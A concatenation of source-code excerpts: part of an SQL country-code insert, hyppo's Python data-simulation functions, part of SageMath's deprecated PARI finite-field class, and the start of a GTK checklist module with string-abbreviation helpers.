(75, 'PF', 'FRENCH POLYNESIA', 'French Polynesia', 'PYF', 258, 689),
(76, 'TF', 'FRENCH SOUTHERN TERRITORIES', 'French Southern Territories', NULL, NULL, 0),
(77, 'GA', 'GABON', 'Gabon', 'GAB', 266, 241),
(78, 'GM', 'GAMBIA', 'Gambia', 'GMB', 270, 220),
(79, 'GE', 'GEORGIA', 'Georgia', 'GEO', 268, 995),
(80, 'DE', 'GERMANY', 'Germany', 'DEU', 276, 49),
(81, 'GH', 'GHANA', 'Ghana', 'GHA', 288, 233),
(82, 'GI', 'GIBRALTAR', 'Gibraltar', 'GIB', 292, 350),
(83, 'GR', 'GREECE', 'Greece', 'GRC', 300, 30),
(84, 'GL', 'GREENLAND', 'Greenland', 'GRL', 304, 299),
(85, 'GD', 'GRENADA', 'Grenada', 'GRD', 308, 1473),
(86, 'GP', 'GUADELOUPE', 'Guadeloupe', 'GLP', 312, 590),
(87, 'GU', 'GUAM', 'Guam', 'GUM', 316, 1671),
(88, 'GT', 'GUATEMALA', 'Guatemala', 'GTM', 320, 502),
(89, 'GN', 'GUINEA', 'Guinea', 'GIN', 324, 224),
(90, 'GW', 'GUINEA-BISSAU', 'Guinea-Bissau', 'GNB', 624, 245),
(91, 'GY', 'GUYANA', 'Guyana', 'GUY', 328, 592),
(92, 'HT', 'HAITI', 'Haiti', 'HTI', 332, 509),
(93, 'HM', 'HEARD ISLAND AND MCDONALD ISLANDS', 'Heard Island and Mcdonald Islands', NULL, NULL, 0),
(94, 'VA', 'HOLY SEE (VATICAN CITY STATE)', 'Holy See (Vatican City State)', 'VAT', 336, 39),
(95, 'HN', 'HONDURAS', 'Honduras', 'HND', 340, 504),
(96, 'HK', 'HONG KONG', 'Hong Kong', 'HKG', 344, 852),
(97, 'HU', 'HUNGARY', 'Hungary', 'HUN', 348, 36),
(98, 'IS', 'ICELAND', 'Iceland', 'ISL', 352, 354),
(99, 'IN', 'INDIA', 'India', 'IND', 356, 91),
(100, 'ID', 'INDONESIA', 'Indonesia', 'IDN', 360, 62),
(101, 'IR', 'IRAN, ISLAMIC REPUBLIC OF', 'Iran, Islamic Republic of', 'IRN', 364, 98),
(102, 'IQ', 'IRAQ', 'Iraq', 'IRQ', 368, 964),
(103, 'IE', 'IRELAND', 'Ireland', 'IRL', 372, 353),
(104, 'IL', 'ISRAEL', 'Israel', 'ISR', 376, 972),
(105, 'IT', 'ITALY', 'Italy', 'ITA', 380, 39),
(106, 'JM', 'JAMAICA', 'Jamaica', 'JAM', 388, 1876),
(107, 'JP', 'JAPAN', 'Japan', 'JPN', 392, 81),
(108, 'JO', 'JORDAN', 'Jordan', 'JOR', 400, 962),
(109, 'KZ', 'KAZAKHSTAN', 'Kazakhstan', 'KAZ', 398, 7),
(110, 'KE', 'KENYA', 'Kenya', 'KEN', 404, 254),
(111, 'KI', 'KIRIBATI', 'Kiribati', 'KIR', 296, 686),
(112, 'KP', 'KOREA, DEMOCRATIC PEOPLE''S REPUBLIC OF', 'Korea, Democratic People''s Republic of', 'PRK', 408, 850),
(113, 'KR', 'KOREA, REPUBLIC OF', 'Korea, Republic of', 'KOR', 410, 82),
(114, 'KW', 'KUWAIT', 'Kuwait', 'KWT', 414, 965),
(115, 'KG', 'KYRGYZSTAN', 'Kyrgyzstan', 'KGZ', 417, 996),
(116, 'LA', 'LAO PEOPLE''S DEMOCRATIC REPUBLIC', 'Lao People''s Democratic Republic', 'LAO', 418, 856),
(117, 'LV', 'LATVIA', 'Latvia', 'LVA', 428, 371),
(118, 'LB', 'LEBANON', 'Lebanon', 'LBN', 422, 961),
(119, 'LS', 'LESOTHO', 'Lesotho', 'LSO', 426, 266),
(120, 'LR', 'LIBERIA', 'Liberia', 'LBR', 430, 231),
(121, 'LY', '<NAME>', 'Libyan Arab Jamahiriya', 'LBY', 434, 218),
(122, 'LI', 'LIECHTENSTEIN', 'Liechtenstein', 'LIE', 438, 423),
(123, 'LT', 'LITHUANIA', 'Lithuania', 'LTU', 440, 370),
(124, 'LU', 'LUXEMBOURG', 'Luxembourg', 'LUX', 442, 352),
(125, 'MO', 'MACAO', 'Macao', 'MAC', 446, 853),
(126, 'MK', 'MACEDONIA, THE FORMER YUGOSLAV REPUBLIC OF', 'Macedonia, the Former Yugoslav Republic of', 'MKD', 807, 389),
(127, 'MG', 'MADAGASCAR', 'Madagascar', 'MDG', 450, 261),
(128, 'MW', 'MALAWI', 'Malawi', 'MWI', 454, 265),
(129, 'MY', 'MALAYSIA', 'Malaysia', 'MYS', 458, 60),
(130, 'MV', 'MALDIVES', 'Maldives', 'MDV', 462, 960),
(131, 'ML', 'MALI', 'Mali', 'MLI', 466, 223),
(132, 'MT', 'MALTA', 'Malta', 'MLT', 470, 356),
(133, 'MH', 'MARSHALL ISLANDS', 'Marshall Islands', 'MHL', 584, 692),
(134, 'MQ', 'MARTINIQUE', 'Martinique', 'MTQ', 474, 596),
(135, 'MR', 'MAURITANIA', 'Mauritania', 'MRT', 478, 222),
(136, 'MU', 'MAURITIUS', 'Mauritius', 'MUS', 480, 230),
(137, 'YT', 'MAYOTTE', 'Mayotte', NULL, NULL, 269),
(138, 'MX', 'MEXICO', 'Mexico', 'MEX', 484, 52),
(139, 'FM', 'MICRONESIA, FEDERATED STATES OF', 'Micronesia, Federated States of', 'FSM', 583, 691),
(140, 'MD', 'MOLDOVA, REPUBLIC OF', 'Moldova, Republic of', 'MDA', 498, 373),
(141, 'MC', 'MONACO', 'Monaco', 'MCO', 492, 377),
(142, 'MN', 'MONGOLIA', 'Mongolia', 'MNG', 496, 976),
(143, 'MS', 'MONTSERRAT', 'Montserrat', 'MSR', 500, 1664),
(144, 'MA', 'MOROCCO', 'Morocco', 'MAR', 504, 212),
(145, 'MZ', 'MOZAMBIQUE', 'Mozambique', 'MOZ', 508, 258),
(146, 'MM', 'MYANMAR', 'Myanmar', 'MMR', 104, 95),
(147, 'NA', 'NAMIBIA', 'Namibia', 'NAM', 516, 264),
(148, 'NR', 'NAURU', 'Nauru', 'NRU', 520, 674),
(149, 'NP', 'NEPAL', 'Nepal', 'NPL', 524, 977),
(150, 'NL', 'NETHERLANDS', 'Netherlands', 'NLD', 528, 31),
(151, 'AN', 'NETHERLANDS ANTILLES', 'Netherlands Antilles', 'ANT', 530, 599),
(152, 'NC', 'NEW CALEDONIA', 'New Caledonia', 'NCL', 540, 687),
(153, 'NZ', 'NEW ZEALAND', 'New Zealand', 'NZL', 554, 64),
(154, 'NI', 'NICARAGUA', 'Nicaragua', 'NIC', 558, 505),
(155, 'NE', 'NIGER', 'Niger', 'NER', 562, 227),
(156, 'NG', 'NIGERIA', 'Nigeria', 'NGA', 566, 234),
(157, 'NU', 'NIUE', 'Niue', 'NIU', 570, 683),
(158, 'NF', 'NORFOLK ISLAND', 'Norfolk Island', 'NFK', 574, 672),
(159, 'MP', 'NORTHERN MARIANA ISLANDS', 'Northern Mariana Islands', 'MNP', 580, 1670),
(160, 'NO', 'NORWAY', 'Norway', 'NOR', 578, 47),
(161, 'OM', 'OMAN', 'Oman', 'OMN', 512, 968),
(162, 'PK', 'PAKISTAN', 'Pakistan', 'PAK', 586, 92),
(163, 'PW', 'PALAU', 'Palau', 'PLW', 585, 680),
(164, 'PS', 'PALESTINIAN TERRITORY, OCCUPIED', 'Palestinian Territory, Occupied', NULL, NULL, 970),
(165, 'PA', 'PANAMA', 'Panama', 'PAN', 591, 507),
(166, 'PG', 'PAPUA NEW GUINEA', 'Papua New Guinea', 'PNG', 598, 675),
(167, 'PY', 'PARAGUAY', 'Paraguay', 'PRY', 600, 595),
(168, 'PE', 'PERU', 'Peru', 'PER', 604, 51),
(169, 'PH', 'PHILIPPINES', 'Philippines', 'PHL', 608, 63),
(170, 'PN', | |
<reponame>RebeccaYin7/hyppo
import numpy as np
class _CheckInputs:
""" Check if additional arguments are correct """
def __init__(self, n, p):
self.n = n
self.p = p
def __call__(self, *args):
if type(self.n) is not int or type(self.p) is not int:
raise ValueError("n and p must be ints")
if self.n < 5 or self.p < 1:
raise ValueError(
"n must be greater than or equal to 5 and p "
"must be greater than or equal to than 1"
)
for arg in args:
if arg[1] is float and type(arg[0]) is int:
continue
if type(arg[0]) is not arg[1]:
raise ValueError("Incorrect input variable type")
def _gen_coeffs(p):
"""Calculates coefficients polynomials"""
return np.array([1 / (i + 1) for i in range(p)]).reshape(-1, 1)
def _random_uniform(n, p, low=-1, high=1):
"""Generate random uniform data"""
return np.array(np.random.uniform(low, high, size=(n, p)))
def _calc_eps(n):
"""Calculate noise"""
return np.random.normal(0, 1, size=(n, 1))
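# A minimal sketch (illustrative only) of the recipe every simulation below follows:
#   x = _random_uniform(n, p, low, high)    # (n, p) design matrix
#   w = _gen_coeffs(p)                      # (p, 1) weights w_i = 1/(i+1)
#   eps = _calc_eps(n)                      # (n, 1) standard-normal noise
#   y = f(x @ w) + kappa * noise * eps      # f and the constant kappa vary per simulation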
def linear(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate linear data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: 1)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Linear :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= w^T X + \kappa \epsilon
Examples
--------
>>> from hyppo.sims import linear
>>> x, y = linear(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
y = x @ coeffs + 1 * noise * eps
return x, y
def exponential(n, p, noise=False, low=0, high=3):
r"""
Simulates univariate or multivariate exponential data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: 0)
The lower limit of the uniform distribution simulated from.
high : float, (default: 3)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Exponential :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(0, 3)^p \\
Y &= \exp (w^T X) + 10 \kappa \epsilon
Examples
--------
>>> from hyppo.sims import exponential
>>> x, y = exponential(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
y = np.exp(x @ coeffs) + 10 * noise * eps
return x, y
def cubic(n, p, noise=False, low=-1, high=1, cubs=[-12, 48, 128], scale=1 / 3):
r"""
Simulates univariate or multivariate cubic data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: 1)
The upper limit of the uniform distribution simulated from.
cubs : list of ints (default: [-12, 48, 128])
Coefficients of the cubic function where each value corresponds to the
order of the cubic polynomial.
scale : float (default: 1/3)
Scaling center of the cubic.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Cubic :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= 128 \left( w^T X - \frac{1}{3} \right)^3
+ 48 \left( w^T X - \frac{1}{3} \right)^2
- 12 \left( w^T X - \frac{1}{3} \right)
+ 80 \kappa \epsilon
Examples
--------
>>> from hyppo.sims import cubic
>>> x, y = cubic(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [
(noise, bool),
(low, float),
(high, float),
(cubs, list),
(scale, float),
]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
x_coeffs = x @ coeffs - scale
y = (
cubs[2] * x_coeffs ** 3
+ cubs[1] * x_coeffs ** 2
        + cubs[0] * x_coeffs
+ 80 * noise * eps
)
return x, y
def joint_normal(n, p, noise=False):
r"""
Simulates univariate or multivariate joint-normal data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, p)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Joint Normal :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}^p`: Let
:math:`\rho = \frac{1}{2} p`, :math:`I_p` be the identity matrix of size
:math:`p \times p`, :math:`J_p` be the matrix of ones of size
:math:`p \times p` and
:math:`\Sigma = \begin{bmatrix} I_p & \rho J_p \\ \rho J_p & (1 + 0.5\kappa) I_p \end{bmatrix}`. Then,
.. math::
(X, Y) \sim \mathcal{N}(0, \Sigma)
Examples
--------
>>> from hyppo.sims import joint_normal
>>> x, y = joint_normal(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 2)
"""
if p > 10:
raise ValueError("Covariance matrix for p>10 is not positive" "semi-definite")
extra_args = [(noise, bool)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
rho = 1 / (2 * p)
cov1 = np.concatenate((np.identity(p), rho * np.ones((p, p))), axis=1)
cov2 = np.concatenate((rho * np.ones((p, p)), np.identity(p)), axis=1)
covT = np.concatenate((cov1.T, cov2.T), axis=1)
eps = _calc_eps(n)
x = np.random.multivariate_normal(np.zeros(2 * p), covT, n)
y = x[:, p : 2 * p] + 0.5 * noise * eps
x = x[:, :p]
return x, y
def step(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate step data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: 1)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Step :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= \mathbb{1}_{w^T X > 0} + \epsilon
where :math:`\mathbb{1}` is the indicator function.
Examples
--------
>>> from hyppo.sims import step
>>> x, y = step(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
if p > 1:
noise = True
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
x_coeff = ((x @ coeffs) > 0) * 1
y = x_coeff + noise * eps
return x, y
def quadratic(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate quadratic data.
Parameters
| |
<filename>src/sage/rings/finite_rings/finite_field_ext_pari.py
"""
Finite Extension Fields implemented via PARI POLMODs (deprecated)
AUTHORS:
- <NAME>: initial version
- <NAME> (2010-12-16): fix formatting of docstrings (:trac:`10487`)
"""
#*****************************************************************************
# Copyright (C) 2005,2007 <NAME> <<EMAIL>>
# Copyright (C) 2010 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
import sage.rings.polynomial.polynomial_element as polynomial_element
import sage.rings.polynomial.multi_polynomial_element as multi_polynomial_element
import sage.rings.integer as integer
import sage.rings.rational as rational
import sage.libs.pari.all as pari
import element_ext_pari
from sage.rings.finite_rings.finite_field_base import FiniteField as FiniteField_generic
import sage.interfaces.gap
class FiniteField_ext_pari(FiniteField_generic):
r"""
Finite Field of order `q`, where `q` is a prime power (not a prime),
implemented using PARI ``POLMOD``. This implementation is the default
implementation for `q \geq 2^{16}`.
INPUT:
- ``q`` -- integer, size of the finite field, not prime
- ``name`` -- variable name used for printing elements of the
finite field
- ``modulus`` -- an irreducible polynomial to construct this field.
OUTPUT:
A finite field of order `q` with the given variable name
EXAMPLES::
sage: P.<x> = PolynomialRing(GF(3))
sage: from sage.rings.finite_rings.finite_field_ext_pari import FiniteField_ext_pari
sage: k = FiniteField_ext_pari(9, 'a', modulus=(x^2 + 2*x + 2))
doctest:...: DeprecationWarning: The "pari_mod" finite field implementation is deprecated
See http://trac.sagemath.org/17297 for details.
sage: k
Finite Field in a of size 3^2
sage: k.is_field()
True
sage: k.characteristic()
3
sage: a = k.gen()
sage: a
a
sage: a.parent()
Finite Field in a of size 3^2
sage: a.charpoly('x')
x^2 + 2*x + 2
sage: [a^i for i in range(8)]
[1, a, a + 1, 2*a + 1, 2, 2*a, 2*a + 2, a + 2]
Fields can be coerced into sets or list and iterated over::
sage: list(k)
[0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2]
The following is a native Python set::
sage: set(k)
{0, 1, 2, a, 2*a, a + 1, 2*a + 1, a + 2, 2*a + 2}
And the following is a Sage set::
sage: Set(k)
{0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2}
We can also make a list via comprehension:
sage: [x for x in k]
[0, 1, 2, a, a + 1, a + 2, 2*a, 2*a + 1, 2*a + 2]
Next we compute with the finite field of order 16, where
the name is named ``b``::
sage: P.<x> = PolynomialRing(GF(2))
sage: from sage.rings.finite_rings.finite_field_ext_pari import FiniteField_ext_pari
sage: k16 = FiniteField_ext_pari(16, "b", modulus=(x^4 + x + 1))
sage: z = k16.gen()
sage: z
b
sage: z.charpoly('x')
x^4 + x + 1
sage: k16.is_field()
True
sage: k16.characteristic()
2
sage: z.multiplicative_order()
15
Of course one can also make prime finite fields::
sage: k = FiniteField(7)
Note that the generator is 1::
sage: k.gen()
1
sage: k.gen().multiplicative_order()
1
Prime finite fields are implemented elsewhere, they cannot be
constructed using :class:`FiniteField_ext_pari`::
sage: k = FiniteField_ext_pari(7, 'a', modulus=polygen(GF(7)))
Traceback (most recent call last):
...
ValueError: The size of the finite field must not be prime.
Illustration of dumping and loading::
sage: K = FiniteField(7)
sage: loads(K.dumps()) == K
True
sage: K = FiniteField(7^10, 'b', impl='pari_mod')
doctest:...: DeprecationWarning: The "pari_mod" finite field implementation is deprecated
See http://trac.sagemath.org/17297 for details.
sage: loads(K.dumps()) == K
True
sage: K = FiniteField(7^10, 'a', impl='pari_mod')
sage: loads(K.dumps()) == K
True
In this example `K` is large enough that Conway polynomials are not
used. Note that when the field is dumped the defining polynomial `f`
is also dumped. Since `f` is determined by a random algorithm, it's
important that `f` is dumped as part of `K`. If you quit Sage and
restart and remake a finite field of the same order (and the order is
large enough so that there is no Conway polynomial), then the defining
polynomial is probably different. However, if you load a previously
saved field, that will have the same defining polynomial. ::
sage: K = GF(10007^10, 'a', impl='pari_mod')
sage: loads(K.dumps()) == K
True
.. NOTE::
We do NOT yet define natural consistent inclusion maps
between different finite fields.
"""
def __init__(self, q, name, modulus=None):
"""
Create finite field of order `q` with variable printed as name.
EXAMPLES::
sage: k = FiniteField(9, 'a', impl='pari_mod'); k
Finite Field in a of size 3^2
"""
from sage.misc.superseded import deprecation
deprecation(17297, 'The "pari_mod" finite field implementation is deprecated')
if element_ext_pari.dynamic_FiniteField_ext_pariElement is None: element_ext_pari._late_import()
from finite_field_constructor import FiniteField as GF
q = integer.Integer(q)
if q < 2:
raise ArithmeticError("q must be a prime power")
# note: the following call takes care of the fact that
# proof.arithmetic() is True or False.
p, n = q.is_prime_power(get_data=True)
if n > 1:
base_ring = GF(p)
elif n == 0:
raise ArithmeticError("q must be a prime power")
else:
raise ValueError("The size of the finite field must not be prime.")
FiniteField_generic.__init__(self, base_ring, name, normalize=True)
self._kwargs = {}
self.__char = p
self.__pari_one = pari.pari(1).Mod(self.__char)
self.__degree = n
self.__order = q
self.__is_field = True
if not sage.rings.polynomial.polynomial_element.is_Polynomial(modulus):
from sage.misc.superseded import deprecation
deprecation(16930, "constructing a FiniteField_ext_pari without giving a polynomial as modulus is deprecated, use the more general FiniteField constructor instead")
if modulus is None or modulus == "default":
from conway_polynomials import exists_conway_polynomial
if exists_conway_polynomial(self.__char, self.__degree):
modulus = "conway"
else:
modulus = "random"
if isinstance(modulus,str):
if modulus == "conway":
from conway_polynomials import conway_polynomial
modulus = conway_polynomial(self.__char, self.__degree)
elif modulus == "random":
# The following is fast/deterministic, but has serious problems since
# it crashes on 64-bit machines, and I can't figure out why:
# self.__pari_modulus = pari.pari.finitefield_init(self.__char, self.__degree, self.variable_name())
# So instead we iterate through random polys until we find an irreducible one.
R = GF(self.__char)['x']
while True:
modulus = R.random_element(self.__degree)
modulus = modulus.monic()
if modulus.degree() == self.__degree and modulus.is_irreducible():
break
else:
raise ValueError("Modulus parameter not understood")
elif isinstance(modulus, (list, tuple)):
modulus = GF(self.__char)['x'](modulus)
elif sage.rings.polynomial.polynomial_element.is_Polynomial(modulus):
if modulus.base_ring() is not base_ring:
modulus = modulus.change_ring(base_ring)
else:
raise ValueError("Modulus parameter not understood")
self._modulus = modulus
f = pari.pari(str(modulus))
self.__pari_modulus = f.subst(modulus.parent().variable_name(), 'a') * self.__pari_one
self.__gen = element_ext_pari.FiniteField_ext_pariElement(self, pari.pari('a'))
self._zero_element = self._element_constructor_(0)
self._one_element = self._element_constructor_(1)
def __reduce__(self):
"""
For pickling.
EXAMPLES::
sage: k.<b> = GF(5^20, impl='pari_mod'); type(k)
<class 'sage.rings.finite_rings.finite_field_ext_pari.FiniteField_ext_pari_with_category'>
sage: k is loads(dumps(k))
True
"""
return self._factory_data[0].reduce_data(self)
def _pari_one(self):
r"""
The PARI object ``Mod(1,p)``. This is implementation specific
and should be ignored by users.
EXAMPLES::
sage: k = GF(7^20, 'a', impl='pari_mod')
sage: k._pari_one()
Mod(1, 7)
"""
return self.__pari_one
def _pari_modulus(self):
"""
The polynomial mod `p` that defines the finite field, as a PARI
object. This is implementation specific, and some finite fields
might not be implemented using PARI, so you should avoid using
this function.
OUTPUT:
- ``gen`` -- a PARI polynomial gen
EXAMPLES::
sage: FiniteField(19^2, 'a', impl='pari_mod')._pari_modulus()
Mod(1, 19)*a^2 + Mod(18, 19)*a + Mod(2, 19)
sage: FiniteField(13^3, 'a', impl='pari_mod')._pari_modulus()
Mod(1, 13)*a^3 + Mod(2, 13)*a + Mod(11, 13)
Note that the PARI modulus is always in terms of a, even if
the field variable isn't. This is because the specific choice
of variable name has meaning in PARI, i.e., it can't be
arbitrary. ::
sage: FiniteField(2^4, "b", impl='pari_mod')._pari_modulus()
Mod(1, 2)*a^4 + Mod(1, 2)*a + Mod(1, 2)
"""
return self.__pari_modulus
def gen(self, n=0):
"""
Return a generator of ``self`` over its prime field, which is a
root of ``self.modulus()``.
INPUT:
- ``n`` -- must be 0
OUTPUT:
An element `a` of ``self`` such that ``self.modulus()(a) == 0``.
.. WARNING::
This generator is not guaranteed to be a generator for the
multiplicative group. To obtain the latter, use
:meth:`~sage.rings.finite_rings.finite_field_base.FiniteFields.multiplicative_generator()`
or use the ``modulus="primitive"`` option when constructing
the field.
EXAMPLES::
sage: FiniteField(2^4, "b", impl='pari_mod').gen()
b
sage: k = FiniteField(3^4, "alpha", impl='pari_mod')
sage: a = k.gen()
sage: a
alpha
sage: a^4
alpha^3 + 1
"""
if n:
raise IndexError("only one generator")
return self.__gen
def characteristic(self):
"""
Returns the characteristic of the finite field, which is a
prime number.
EXAMPLES::
sage: k = FiniteField(3^4, 'a', impl='pari_mod')
sage: k.characteristic()
3
"""
return self.__char
def degree(self):
"""
Returns | |
import sys
import os
import copy
import collections
try:
Counter=collections.Counter
pass
except AttributeError:
# python 2.6 and earlier don't have collections.Counter.
# Use local version py26counter.py instead
import py26counter
Counter=py26counter.Counter
pass
import numpy as np
if "gi" in sys.modules: # gtk3
import gi
gi.require_version('Gtk','3.0')
from gi.repository import Gtk as gtk
from gi.repository import GObject as gobject
pass
else :
# gtk2
import gtk
import gobject
pass
from . import dc_value
from . import paramdb2 as pdb
from . import checklistdb
__pychecker__="no-argsused no-import"
###***!!! Should modify to request notifications from checklistdb!!!***
###*** Should modify to be able to show only certain checklists (e.g. open ones) http://faq.pygtk.org/index.py?req=show&file=faq13.048.htp
def attemptuniqify(entry,instructions):
# apply abbreviation instructions to entry
# instructions are a list of tuples.
# each tuple is (num of chars, True to copy chars or False to replace them with "...")
entrypos=0
instrpos=0
entryresolved=""
while entrypos < len(entry):
if instrpos >= len(instructions):
entryresolved+=entry[entrypos:]
entrypos+=len(entry)-entrypos
continue
#sys.stderr.write("er=%s instr=%s\n" % (entryresolved,str(instructions[instrpos])))
if instructions[instrpos][1] or instructions[instrpos][0] < 4: # copy chars if we are told to or if the number to hide is less than 4
entryresolved+=entry[entrypos:(entrypos+instructions[instrpos][0])]
pass
else:
entryresolved+="..."
pass
entrypos+=instructions[instrpos][0]
instrpos+=1
pass
#sys.stderr.write("entryresolved=%s\n\n" % (entryresolved))
return entryresolved
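# A worked example (illustrative values, not part of the original module): with
# instructions [(12, False), (4, True)] the first 12 characters are collapsed to "..."
# and the remaining characters are copied, so
#   attemptuniqify("measurement_alpha", [(12, False), (4, True)])  ->  "...alpha"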
def resolveuniqifyconflict(conflictlist):
# idxaccumulator=collections.Counter()
maxlen=0
for entry in conflictlist:
if len(entry) > maxlen:
maxlen=len(entry)
pass
pass
nparray=np.zeros((len(conflictlist),maxlen),dtype='U') # create character-by-character array
for cnt in range(len(conflictlist)):
nparray[cnt,:len(conflictlist[cnt])]=tuple(conflictlist[cnt])
pass
numunique=np.zeros(maxlen,np.uint32)
for col in range(maxlen):
numunique[col]=len(np.unique(nparray[:,col]))
pass
# translate into string where 's' means one single value for entire column, 'm' means multiple values
uniquemap=''.join([ 's' if entry==1 else 'm' for entry in numunique])
uniquesplit=uniquemap.split('m')
instructions=[] # each instructions entry is tuple: (numchars,True) to copy the characters, (numchars,False) to replace them by "..."
for cnt in range(len(uniquesplit)):
entry=uniquesplit[cnt]
if len(entry) > 3:
instructions.append((len(entry),False))
elif len(entry) > 0 :
instructions.append((len(entry),True))
pass
if cnt != len(uniquesplit)-1:
instructions.append((1,True)) # copy the multiple-valued character (separator from the split)
pass
pass
# join duplicate instructions
pos=0
while pos < len(instructions)-1:
if instructions[pos][1] and instructions[pos+1][1]:
instructions[pos]=(instructions[pos][0]+instructions[pos+1][0],True)
del instructions[pos+1]
pass
else:
pos+=1
pass
pass
resolvedlist=[]
for entry in conflictlist:
entryresolved=attemptuniqify(entry,instructions)
resolvedlist.append(entryresolved)
pass
return (resolvedlist,instructions)
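# A worked example (illustrative values): for two entries that share a 12-character
# prefix and differ only afterwards,
#   resolveuniqifyconflict(["measurement_alpha", "measurement_beta"])
# returns (["...alpha", "...beta"], [(12, False), (4, True)]), i.e. hide the common
# prefix and keep the distinguishing tail.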
def uniqify(listofstrings):
# given a list of strings, insert ellipsis as possible to keep different strings different
# get unique strings
stringset=set(listofstrings)
# Create a reverse mapping of abbreviations to strings
reversemap={}
for entry in stringset:
if len(entry) < 7:
reversemap[entry]=entry
pass
else:
abbreviated=entry[0:3]+"..."
if abbreviated in reversemap:
if isinstance(reversemap[abbreviated],tuple):
# if it's a tuple then it points at our previous attempts to resolve
(conflictlist,resolvedlist,instructions)=reversemap[abbreviated]
conflictlist.append(entry)
#import pdb as pythondb
#try:
# re-resolve
entryresolved=attemptuniqify(entry,instructions)
#except:
# pythondb.post_mortem()
if entryresolved in reversemap:
# previous method failed
# remove current resolution
for cnt in range(len(resolvedlist)):
del reversemap[resolvedlist[cnt]]
pass
# develop new resolution
(resolvedlist,instructions)=resolveuniqifyconflict(conflictlist)
# apply new resolution
for cnt in range(len(conflictlist)):
reversemap[resolvedlist[cnt]]=conflictlist[cnt]
pass
reversemap[abbreviated]=(conflictlist,resolvedlist,instructions)
pass
else:
resolvedlist.append(entryresolved)
reversemap[entryresolved]=entry
pass
pass
else :
conflictlist=[entry,reversemap[abbreviated]]
(resolvedlist,instructions)=resolveuniqifyconflict(conflictlist)
reversemap[abbreviated]=(conflictlist,resolvedlist,instructions)
# apply
for cnt in range(len(conflictlist)):
reversemap[resolvedlist[cnt]]=conflictlist[cnt]
pass
pass
pass
else :
# this prefix is not present... insert it
reversemap[abbreviated]=entry
pass
pass
pass
# Remove record of previous resolve attempts
for abbreviated in reversemap.keys():
if isinstance(reversemap[abbreviated],tuple):
del reversemap[abbreviated]
pass
pass
# Create forward mapping
forwardmap = dict((reversemap[abbrev],abbrev) for abbrev in reversemap)
return [forwardmap[s] for s in listofstrings]
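# A worked example (illustrative values): short strings are left alone and long ones
# are abbreviated just enough to stay distinct, e.g.
#   uniqify(["measurement_alpha", "measurement_beta", "meas"])
#     ->  ["...alpha", "...beta", "meas"]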
# doabbrev is no longer used
def doabbrev(listofobjs,objattr,objabbrevattr,separator="_"):
# go through listofobjs and place abbreviations for attribute objattr in attribute objabrrevattr
# split according to underscores
# find maximum length
